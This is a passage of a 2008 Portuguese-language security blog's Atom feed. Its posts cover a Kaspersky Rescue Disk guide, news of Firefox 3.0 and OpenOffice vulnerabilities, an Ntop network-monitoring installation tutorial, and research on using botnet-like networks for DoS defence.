class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-1018875422066297933?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/1018875422066297933/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=1018875422066297933' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/1018875422066297933'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/1018875422066297933'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/06/site-falso-disfarado-como-imageshack.html' title='Site falso disfarçado como ImageShack distribui malware'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-1334441814188511752</id><published>2008-06-24T12:48:00.000-07:00</published><updated>2008-06-24T12:49:19.795-07:00</updated><title type='text'>Remova vírus com o Kaspersky Rescue Disk</title><content type='html'>&lt;p align="justify"&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;Alguns vírus são muito destrutivos e difíceis de serem removidos do Windows quando o usuário não tem conhecimento para isso. &lt;/span&gt;&lt;/p&gt; &lt;p align="justify"&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;A boa notícia é que a Kaspersky está oferecendo um Rescue Disk (Disco de Recuperação) para fazer a varredura e remover vírus do computador sem a necessidade de iniciar o Windows. U&lt;/span&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;ma grande vantagem é que você pode utilizar este CD em qualquer computador para detectar e eliminar os vírus ali existentes.&lt;br /&gt;&lt;br /&gt;O Kaspersky Rescue Disk oferece uma maneira segura de remover um vírus de computador de maneira rápida, gratuita e sem o risco de ficar infectado. Tudo o que você precisa fazer é o download do arquivo ISO, gravar a imagem em um CD ou DVD e reiniciar o computador a partir desse disco.&lt;/span&gt;&lt;/p&gt; &lt;p align="justify"&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;Veja um passo-a-passo sobre como usar o Kaspersky Rescue Disk:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1.&lt;/strong&gt; Faça o &lt;/span&gt;&lt;a href="http://dnl-eu10.kaspersky-labs.com/devbuilds/RescueDisk/" target="_blank"&gt;&lt;!--coloro:#0000ff--&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;&lt;!--/coloro--&gt;&lt;strong&gt;&lt;span style="font-family:Tahoma;"&gt;&lt;span style="font-size:85%;"&gt;download&lt;!--colorc--&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;!--/colorc--&gt;&lt;/a&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt; da ISO do Kaspersky Rescue Disk.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;2.&lt;/strong&gt; Grave o CD com seu software de gravação de ISO/DVD.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;3.&lt;/strong&gt; Reinicie seu computador através do disco.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;4.&lt;/strong&gt; Aparecerá uma tela como a imagem abaixo. Pressione a tecla &lt;b&gt;Enter&lt;/b&gt; para iniciar o Antivírus.&lt;/span&gt;&lt;/p&gt; &lt;p align="center"&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;&lt;img src="http://www.baboo.com.br/absolutenm/articlefiles/32310-1.png" align="absmiddle" border="0" /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p align="justify"&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;&lt;strong&gt;5.&lt;/strong&gt; Depois que o Kaspersky Anti-Virus 2009 estiver carregado, escolha os discos rígidos que você deseja verificar e clique em &lt;b&gt;Start scan&lt;/b&gt;.&lt;/span&gt;&lt;/p&gt; &lt;p align="center"&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;&lt;img src="http://www.baboo.com.br/absolutenm/articlefiles/32310-2.png" align="absmiddle" border="0" /&gt;&lt;/span&gt;&lt;/p&gt; &lt;span style="font-family:Tahoma;font-size:85%;"&gt;&lt;strong&gt;6.&lt;/strong&gt; O programa fará o resto.&lt;br /&gt;&lt;br /&gt;Você pode utilizar este CD em qualquer computador para detectar e eliminar os vírus ali existentes.&lt;br /&gt;&lt;br /&gt;Caso você esteja utilizando o Kaspersky Anti-Virus 2009 ou o Kaspersky Internet Security 2009 no seu computador, você também pode criar o seu próprio Rescue Disk, mas usá-lo em outros computadores poderá levar a conseqüências imprevisíveis, uma vez que contém informações&lt;a href="http://www.baboo.com.br/absolutenm/templates/content.asp?articleid=32310&amp;amp;zoneid=10&amp;amp;resumo=remova_v%C3%ADrus_kaspersky_rescue_disk#" onclick="hwClick16084485051671(1008173191);return false;" style="border-bottom: 1px dotted; color: rgb(0, 128, 0); text-decoration: underline;" onmouseover="hw16084485051671(event, this, '1008173191'); this.style.cursor='hand'; this.style.textDecoration='underline'; this.style.borderBottom='solid';" onmouseout="hideMaybe(event, this); this.style.cursor='hand'; this.style.textDecoration='underline'; this.style.borderBottom='dotted 1px'; " oncontextmenu="return false;"&gt;&lt;/a&gt; sobre os parâmetros de um determinado computador.&lt;br /&gt;&lt;br /&gt;:P&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-1334441814188511752?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/1334441814188511752/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=1334441814188511752' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/1334441814188511752'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/1334441814188511752'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/06/remova-vrus-com-o-kaspersky-rescue-disk.html' title='Remova vírus com o Kaspersky Rescue Disk'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-4745320371567152954</id><published>2008-06-24T12:43:00.000-07:00</published><updated>2008-06-24T12:48:23.036-07:00</updated><title type='text'>Firefox 3.0 já apresenta falha crítica de segurança</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.baboo.com.br/absolutenm/articlefiles/32326-ff_crack.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 134px; height: 134px;" src="http://www.baboo.com.br/absolutenm/articlefiles/32326-ff_crack.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;Em Menos de um dia depois de seu lançamento oficial, foi descoberta uma vulnerabilidade no&lt;span style="font-weight: bold;"&gt; FireFox 3.0.&lt;/span&gt; De acordo com a Zero Day Initiative,da Tipping Point, a vulnerabilidade classificada como crítica foi reportada nas primeiras cinco horas depois do lançamento oficial do browser.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:Tahoma;"&gt;&lt;span style="font-size:85%;"&gt;&lt;em&gt;"Assim que a vulnerabilidade foi verificada no TippingPoint DVLabs e adquirida do pesquisador, ela foi reportada para a equipe deda Mozilla"&lt;/em&gt;, disse um representante.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;Embora a equipe da Zero Day Initiative não forneça detalhes específicos até que a desenvolvedora tenha uma chance de corrigi-la, o blog informou que esta vulnerabilidade, que também afeta o Firefox 2, precisa de interação do usuário e pode resultar na execução de código arbitrário.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;A Mozilla informou que está trabalhando em uma correção. A Zero Day Initiative já foi criticada no passado por pagar pesquisadores que descobrem vulnerabilidades.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-4745320371567152954?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/4745320371567152954/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=4745320371567152954' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/4745320371567152954'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/4745320371567152954'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/06/firefox-30-j-apresenta-falha-crtica-de.html' title='Firefox 3.0 já apresenta falha crítica de segurança'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-3404623994059952306</id><published>2008-06-11T09:45:00.001-07:00</published><updated>2008-06-11T09:45:48.483-07:00</updated><title type='text'>Bug no OpenOffice permite invasão</title><content type='html'>Uma falha na suíte OpenOffice.org permite a execução remota de código na máquina vulnerável. O problema as versões de 2.0 a 2.4. &lt;p&gt; &lt;/p&gt;&lt;p&gt;O erro se manifesta num estouro de memória durante a manipulação de alguns arquivos. A brecha pode ser utilizada para invadir o micro do usuário. Segundo o Projeto OpenOffice.org, não há notícia de que a falha tenha sido explorada. &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;br /&gt;&lt;p&gt;A solução consiste em atualizar a suíte para a versão 2.4.1. Usuários das versões de 2.0 a 2.4, inclusive, devem fazer o upgrade. &lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Será? rs&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-3404623994059952306?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/3404623994059952306/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=3404623994059952306' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/3404623994059952306'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/3404623994059952306'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/06/bug-no-openoffice-permite-invaso.html' title='Bug no OpenOffice permite invasão'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-700696001289178033</id><published>2008-06-09T07:05:00.000-07:00</published><updated>2008-06-09T07:07:26.522-07:00</updated><title type='text'>Microsoft Resolve Liberar Código Fonte de Windows Vista</title><content type='html'>&lt;div style="text-align: left;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm3.static.flickr.com/2103/2411566234_09fa080720_o.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 461px; height: 791px;" src="http://farm3.static.flickr.com/2103/2411566234_09fa080720_o.gif" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-700696001289178033?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/700696001289178033/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=700696001289178033' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/700696001289178033'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/700696001289178033'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/06/microsoft-resolve-liberar-cdigo-fonte.html' title='Microsoft Resolve Liberar Código Fonte de Windows Vista'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-1331576601322161684</id><published>2008-06-09T06:39:00.000-07:00</published><updated>2008-06-09T06:40:20.435-07:00</updated><title type='text'>Memoria Flash agora em Servidores</title><content type='html'>&lt;p class="MsoNormal"&gt;Após a onda de MIDs (Móbile Internet Device) substituindo os antigos Discos Rígidos por cartões de memória sólida (SSD), agora é a vez de uma grande fabricante de Servidores anunciar que seus servidores virão equipados com o mesmo tipo de Disco.&lt;/p&gt;    &lt;p&gt;A Sun anuncia que a partir do segundo semestre desse ano seus servidores virão equipados com discos em estado sólido. A fabricante afirma que está baseando sua decisão no melhor desempenho e na economia de energia, até 5 vezes menos, gerada por esse modelo.&lt;/p&gt;    &lt;p&gt;Os entusiastas pelo Software Livre também tem uma boa noticia, a Sun anuncia que seus discos serão otimizados para trabalhar com o banco de dados MySQL e com o Solaris &lt;a href="http://www.linuxmagazine.com.br/noticia/zfs_no_linux_em_breve" title="ZFS (Zettabyte File Systems)"&gt;ZFS (Zettabyte File Systems)&lt;/a&gt;, o sistema de arquivos do sistema operacional Solaris.&lt;/p&gt;    &lt;p&gt;Os discos sólidos já são uma realidade, porem o alto custo por Gigabyte ainda impede a grande massificação dessa tecnologia. Com grandes fabricantes utilizando-a com certeza o aumento de demanda fará com que esses preços caiam nos próximos anos, e quem sabe em pouquíssimo tempo poderemos ter essa tecnologia em nossos PCs domésticos.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-1331576601322161684?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/1331576601322161684/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=1331576601322161684' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/1331576601322161684'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/1331576601322161684'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/06/memoria-flash-agora-em-servidores.html' title='Memoria Flash agora em Servidores'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-7776804975745545305</id><published>2008-06-04T10:20:00.000-07:00</published><updated>2008-06-04T10:27:23.847-07:00</updated><title type='text'>Monitorando redes utilizando Ntop</title><content type='html'>&lt;p&gt;A maioria dos administradores de redes de pequeno e médio porte, desconhecem softwares que auxiliam nessas tarefas. Um deles é o Ntop, software open-source de fácil instalação e interpretação. &lt;/p&gt;  &lt;p&gt;Ao final deste artigo você será capaz de: &lt;/p&gt;  &lt;ul&gt;&lt;li&gt;Instalar e configurar o Ntop &lt;/li&gt;&lt;li&gt;Acessar via browser os relatórios&lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;&lt;span class="c2"&gt;&lt;strong&gt;Considerações Iniciais&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;Utilizaremos duas ferramentas de instalações. A primeira é a urpmi, utilizada em algumas distribuições como a Mandriva e etc. A Segunda é o APT-GET, utilizado em outras distribuições como Ubuntu e etc.&lt;/p&gt;  &lt;p&gt;Este texto é original do livro Mandriva / Cap 6, e adaptado por Guilherme S Zanoni.&lt;/p&gt;  &lt;p&gt;&lt;strong&gt;&lt;span class="c2"&gt;Para Saber mais:&lt;/span&gt;&lt;/strong&gt; &lt;a href="http://www.ntop.org/" class="ext"&gt;Network Top - Ntop&lt;/a&gt;&lt;/p&gt;  &lt;p&gt;&lt;span class="c2"&gt;&lt;strong&gt;Ntop e suas funcionalidades&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;O Ntop é um programa que monitora passivamente uma rede, coletando dados sobre os protocolos e sobre os hosts da rede.&lt;/p&gt;  &lt;p&gt;&lt;span class="c1"&gt;Características e Funcionalidades:&lt;/span&gt;&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;Analisa os pacotes que trafegam na rede;&lt;/li&gt;&lt;li&gt;Lista e ordena o tráfego de rede de acordo com vários protocolos;&lt;/li&gt;&lt;li&gt;Exibe estatísticas de tráfego; &lt;/li&gt;&lt;li&gt;Armazena estatísticas de forma permanentemente em bancos de dados; &lt;/li&gt;&lt;li&gt;Identifica passivamente várias informações obre os hosts da rede, incluindo o sistema operacional executado e endereço de e-mail do usuário da estação;&lt;/li&gt;&lt;li&gt;Exibe a distribuição do tráfego IP entre vários protocolos da camada de aplicação; &lt;/li&gt;&lt;li&gt;Decodifica vários protocolos da camada de aplicação, inclusive os encontrados em softwares do tipo P2P; &lt;/li&gt;&lt;li&gt;Atua como coletor de fluxos gerados por roteadores e switches através da tecnologia NETFLOW;&lt;/li&gt;&lt;li&gt;Possui um WebServer integrado que permite consultas às informações através de um browser.&lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;&lt;strong&gt;&lt;span class="c2"&gt;Instalação do Ntop&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;  &lt;p&gt;Para instalar o Ntop no Mandriva Linux, utilize o urpmi:&lt;/p&gt;  &lt;p&gt;&lt;kbd&gt;#urpmi ntop -auto&lt;/kbd&gt;&lt;/p&gt;  &lt;p&gt;Para instalar o Squid no Ubuntu, utilize o apt-get:&lt;/p&gt;  &lt;p&gt;&lt;kbd&gt;#apt-get install ntop&lt;/kbd&gt;&lt;/p&gt;  &lt;p&gt;O código fonte do Ntop pode ser obtido no site oficial do projeto listado na seção "Para saber mais". &lt;/p&gt;  &lt;p&gt;Vale observar que, além da instalação do programa, outras operações foram efetuadas no seu servidor/desktop, entre elas:&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;O usuário "ntop" foi adicionado ao sistema e será usado para executar o processo ntop;&lt;/li&gt;&lt;li&gt;O arquivo de inicialização foi instalado em /etc/rc.d/init.d/ntop (Mandriva) e /etc/init.d/ntop (Ubuntu) e configurado para ser iniciado no boot.&lt;/li&gt;&lt;/ul&gt;  &lt;h3&gt;Configurando o Ntop&lt;/h3&gt;  &lt;p&gt;O Ntop não é um software que possui arquivos de configurações editáveis. Alguns parâmetros podem ser setados pela interface web, mas a maioria deles são opções passadas pela linha de comando, no momento da inicialização. &lt;/p&gt;  &lt;h4&gt;Primeira execução do Ntop&lt;/h4&gt;  &lt;p&gt;Por default, o Ntop é inicializado no boot como um deamon, ou seja, um processo que rodará em Background, sem um terminal controlador. Se tentarmos inicializá-lo desta forma, as seguintes mensagens de erro serão logadas via syslog: &lt;/p&gt;  &lt;h5&gt;/var/log/messages:&lt;/h5&gt;  &lt;p&gt;&lt;kbd&gt;Jun 28 13:51:12 ntop[3327]: INITWEB: initializing web server&lt;/kbd&gt;&lt;/p&gt; &lt;kbd&gt;Jun 28 13:51:12 ntop[3327]: &lt;/kbd&gt;&lt;h4&gt; FATAL ERROR &lt;/h4&gt; No password for admin user - please re-run ntop in non-deamon mode first  &lt;p&gt;Ou seja, você deverá criar logo após a instalação um senha para o usuário que administrará o Ntop. Para fazê-lo, basta usar o comando abaixo: &lt;/p&gt;  &lt;p&gt;&lt;kbd&gt;# /usr/sbin/ntop -P /var/lib/ntop -U ntop -A&lt;/kbd&gt;&lt;/p&gt; &lt;kbd&gt;Thu Jun 28 13:55:14 2007 Initializing gdbm databases&lt;/kbd&gt;  &lt;p&gt;&lt;kbd&gt;Please enter the password for the admin user:     &lt;--- Digite uma senha&lt;/kbd&gt;&lt;/p&gt; &lt;kbd&gt;Please enter the password again:                            &lt;--- Confirme a senha&lt;/kbd&gt;  &lt;p&gt;&lt;kbd&gt;Thu Jun 28 13:55:14 2007 Admin user password has been set&lt;/kbd&gt;&lt;/p&gt;  &lt;p&gt;Pronto, agora poderemos inicializar o serviço Ntop corretamente:&lt;/p&gt;  &lt;p&gt;No Mandriva Linux:&lt;/p&gt;  &lt;p&gt;Na pasta /etc/rc.d/init.d/ digite:&lt;/p&gt; &lt;kbd&gt;# ./ntop start&lt;/kbd&gt;  &lt;p&gt;No Ubuntu Linux:&lt;/p&gt;  &lt;p&gt;Na pasta /etc/init.d/ digite:&lt;/p&gt; &lt;kbd&gt;# ./ntop start&lt;/kbd&gt;  &lt;p&gt;&lt;strong&gt;&lt;span class="c2"&gt;Parâmetros Adicionais&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;  &lt;h5&gt;Lista de parâmetros mais úteis:&lt;/h5&gt;  &lt;p&gt;&lt;img style="width: 563px; height: 532px;" src="http://conteudo.imasters.com.br/6498/tabela1.bmp" alt="" /&gt;&lt;/p&gt;  &lt;p&gt;Para editar o arquivo que carrega os parâmetros inicias, edite o seguinte arquivo&lt;/p&gt; &lt;kbd&gt;/etc/sysconfig/ntop:&lt;/kbd&gt;  &lt;h4&gt;Exemplo:&lt;/h4&gt;  &lt;p&gt;&lt;kbd&gt;extra_arg="-i eth0,eth1 -W 3001"&lt;/kbd&gt;&lt;/p&gt;  &lt;p&gt;&lt;span class="c2"&gt;&lt;strong&gt;Monitoramento de protocolos adicionais&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;Por padrão, o Ntop monitora apenas um conjunto reduzido de protocolos, listados na tabela a seguir: &lt;/p&gt;  &lt;p&gt;&lt;img src="http://conteudo.imasters.com.br/6498/tabela2.bmp" alt="" /&gt;&lt;/p&gt;  &lt;p&gt;Este conjunto de procolos pode ser substituído pelo administrador através do parâmetro de execução -p, que recebe o nome de um arquivo contendo os protocolos à monitorar como argumento.&lt;/p&gt;  &lt;h5&gt;Edite o arquivo /etc/sysconfig/ntop:&lt;/h5&gt;  &lt;p&gt;&lt;kbd&gt;Extra_arg="-i eth0,eth1 -W 3001 -p /usr/libntop/ntop/new-protocol.list&lt;/kbd&gt;&lt;/p&gt;  &lt;p&gt;&lt;strong&gt;&lt;span class="c2"&gt;Usando o Ntop&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;  &lt;p&gt;Após a instalação e configuração inicial, podemos acessar a interface Web pelo endereço http://servidor.empresa:3000 ou via https://servidor.empresa:3001 (caso tenha habilitado HTTPS na porta 3001).&lt;/p&gt;  &lt;p&gt;A partir do menu superior podemos acessar todas as opções de interface Web.&lt;/p&gt;  &lt;p&gt;&lt;strong&gt;&lt;span class="c2"&gt;Dicas&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;Para utilizar o Ntop apenas como coletor de fluxos NetFlow, desabilitando a captura de tráfego em interfaces de redes físicas da maquina onde ele é executado, utilize "nome" como argumento da opção -i, na linha de comando.&lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;Edite o arquivo &lt;kbd&gt;/etc/sysconfig/ntop&lt;/kbd&gt;:&lt;/p&gt;  &lt;p&gt;&lt;kbd&gt;Extra_arg="-i nome"&lt;/kbd&gt;&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;Para permitir que apenas usuários autenticados acessem as páginas da interface web do Ntop, acesse no menu Admin &gt; Configure &gt; Protect URLS. No rodapé da tabela clique em "ADD URL", não preencha o campo URL, apenas selecione os usuários que você quer autorizar e clique no botão "ADD URL". A palavra chave "*" será adicionada à lista, representando todas as páginas da interface web e garantindo que a autenticação sempre será solicitada. &lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-7776804975745545305?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/7776804975745545305/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=7776804975745545305' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/7776804975745545305'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/7776804975745545305'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/06/monitorando-redes-utilizando-ntop.html' title='Monitorando redes utilizando Ntop'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-9024335592074834230</id><published>2008-06-04T09:34:00.000-07:00</published><updated>2008-06-04T09:35:46.848-07:00</updated><title type='text'>Especialistas querem usar botnets como meio de defesa</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://br.zone-h.org/images/stories/2008/abr/botnet.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 212px; height: 127px;" src="http://br.zone-h.org/images/stories/2008/abr/botnet.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Especialistas da Universidade de Washington, nos Estados Unidos, chegaram à conclusão de que uma boa maneira de neutralizar ataques de redes botnets, em que computadores infectados por malware são utilizados, é usar uma tecnologia semelhante para proteção. &lt;p&gt; Um novo sistema da universidade, Phalanx, utiliza sua própria rede para batalhar contra o "exército zumbi" e garantir que nenhum ataque, ou apenas uma pequena porcentagem deles, chegue ao servidor principal, conforme noticiou o site &lt;span class="link-external"&gt;&lt;a href="http://www.pcpro.co.uk/news/191040/good-botnets-to-take-on-the-bad-boys.html" target="_blank"&gt;PC Pro&lt;/a&gt;&lt;/span&gt;. &lt;/p&gt; &lt;p&gt; A idéia é que a rede seja utilizada como escudo e que todas as informações de requisição ao servidor passe, antes, por pontos interligados desta rede, chamados de "computadores mailbox". Por enviar pacotes em seqüências aleatórias, os ataques dificilmente chegariam ao servidor... &lt;/p&gt;   &lt;p&gt; O Phalanx ainda poderia exigir que os computadores requerentes solucionassem um puzzle criptográfico, algo que seria solucionado em apenas alguns segundos em uma conexão comum, mas que no caso de um ataque DoS, com múltiplas requisições, seria significativamente atrasado. &lt;/p&gt; &lt;p&gt; Ao &lt;span class="link-external"&gt;&lt;a href="http://technology.newscientist.com/channel/tech/dn13753-to-defeat-a-malicious-botnet-build-a-friendly-one.html" target="_blank"&gt;NewScientist&lt;/a&gt;&lt;/span&gt;, o pesquisador Colin Dixon, envolvido no projeto, explica que a proteção poderia ser feita pela própria rede de computadores que as grandes empresas utilizam para servir conteúdo. &lt;/p&gt; &lt;p&gt; Em um teste, foi simulado um ataque por uma botnet com um milhão de zumbis, contra uma rede de 7.200 computadores mailbox organizada pelo Phalanx. Mesmo que muitos ataques tenham sido feitos contra estes mailboxes, o servidor não foi sobrecarregado e continuou funcionando normalmente. &lt;/p&gt; &lt;p&gt; O Phalanx não está destinado apenas a redes corporativas, e em breve poderá ser utilizado em máquinas domésticas. "Como trabalho futuro, estamos pensando em explorar uma modificação de um popular cliente BitTorrent para converter os milhões de usuários BitTorrent em uma comunidade de defesa botnet", declararam os criadores da nova tecnologia, acrescentando que um único grande provedor poderia implementar uma solução DoS eficiente para seus clientes sem precisar entrar em um acordo global com outros provedores. &lt;/p&gt; &lt;p&gt; &lt;strong&gt;Fonte: &lt;/strong&gt;&lt;a href="http://magnet.pro.br/cosmonet/especialistas-querem-usar-botnets-como-meio-de-defesa/" target="_blank"&gt;http://magnet.pro.br&lt;/a&gt; &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 